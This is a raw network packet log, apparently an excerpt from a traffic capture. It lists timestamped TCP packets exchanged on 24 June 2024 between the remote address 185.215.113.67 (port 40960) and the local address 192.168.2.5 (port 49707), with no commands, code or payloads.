Jun 24, 2024 00:10:19.730745077 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730757952 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730772018 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730779886 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730787039 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730813026 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730823040 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730825901 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730864048 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730870962 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730874062 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730945110 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730959892 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730967999 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730982065 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730988979 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730995893 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.731120110 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.731127977 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.731136084 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.731142998 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.731216908 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.731287003 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.731688976 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.731844902 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.731852055 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.731858969 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.731882095 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.731889009 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.731893063 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.731992006 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735261917 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735270023 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735289097 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735397100 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735407114 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735637903 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735682011 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735688925 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735718966 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735727072 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735824108 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735831976 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735841990 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735858917 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.735923052 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736013889 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736059904 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736073017 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736079931 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736088037 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736128092 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736135006 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736138105 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736157894 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.736159086 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736181021 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736187935 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736197948 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736227036 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.736243963 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736251116 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736257076 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736277103 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736284018 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736335993 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736351013 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736361980 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736368895 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736391068 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736397982 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736404896 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736419916 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736428022 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736462116 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736489058 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736509085 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736534119 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736541986 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736546040 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736548901 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736569881 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736577034 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736650944 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736658096 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736819029 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736826897 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736834049 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736990929 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.736999035 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737005949 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737014055 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737020969 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737030983 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737037897 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737046003 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737051964 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737309933 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737318039 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737324953 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737332106 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737339973 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.737541914 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.737600088 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.741051912 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741111040 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741117954 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741138935 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741240978 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741250038 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741255999 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741302013 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741345882 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741398096 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741405010 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741451979 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741460085 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741470098 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741482019 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741502047 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741508961 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741512060 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741518974 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741539955 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741552114 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741560936 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741583109 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741590977 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741597891 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741611004 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741677046 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741683960 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741687059 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741728067 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741734982 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741774082 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741781950 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741789103 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741803885 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741817951 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741827011 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741833925 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741866112 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741955996 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741964102 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741966963 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741970062 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741978884 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741986036 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.741993904 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742001057 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742007971 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742079020 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742085934 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742093086 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742100000 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742106915 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742316008 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742335081 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742373943 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742382050 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742413044 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742422104 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742429018 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742449999 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742469072 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742475986 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742482901 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742503881 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742511034 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742518902 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742564917 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742573023 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742578983 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742587090 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742609978 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742616892 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742624044 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742659092 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742669106 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.742683887 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742686987 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742690086 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742728949 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.742729902 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742739916 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742747068 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742758036 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742772102 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742779970 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742786884 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742794037 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742814064 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742820978 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742834091 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742847919 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742861986 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742870092 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742877007 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742885113 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742904902 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742912054 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742918968 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742944002 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742952108 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742959023 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742986917 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.742994070 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.743000984 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.743040085 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.743047953 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.743055105 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.747673988 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.747848988 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.747857094 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.747869968 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.747876883 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.747884989 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.747920990 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.747929096 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.747944117 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.747956038 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.747963905 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.747971058 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.747994900 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748003006 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748006105 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.748034954 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748049021 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748101950 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748110056 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748178959 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748203039 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748214006 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748231888 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748244047 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748250961 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748258114 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748265982 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748321056 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748327971 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748333931 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748342991 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748349905 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748492002 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748500109 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748507023 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748516083 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748523951 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748531103 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748538017 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748542070 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748548031 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748555899 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748574972 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748588085 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748595953 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748603106 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748610020 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748616934 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748631001 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748637915 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748646975 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748657942 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.748666048 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.749023914 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.749032021 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.752815008 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.752851009 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.752859116 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.752861977 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.752870083 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.752939939 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.752969027 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.752975941 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.752984047 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.752991915 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.752999067 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753012896 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753021955 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753060102 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753072023 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.753110886 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753119946 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753125906 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.753127098 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753151894 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753160000 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753165960 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753216982 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753223896 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753259897 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753293037 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753300905 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753308058 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753351927 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753360033 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753460884 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753473997 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753482103 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753495932 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753503084 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753509998 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753534079 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753541946 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753547907 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753566027 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753572941 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753581047 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753602028 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753640890 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753648043 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753650904 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753726959 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753735065 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753741980 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753808975 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753818035 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.753824949 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.754328966 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.754337072 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.754344940 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.757920980 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758006096 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758053064 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758059978 CEST	40960	49707	185.215.113.67	192.168.2.5
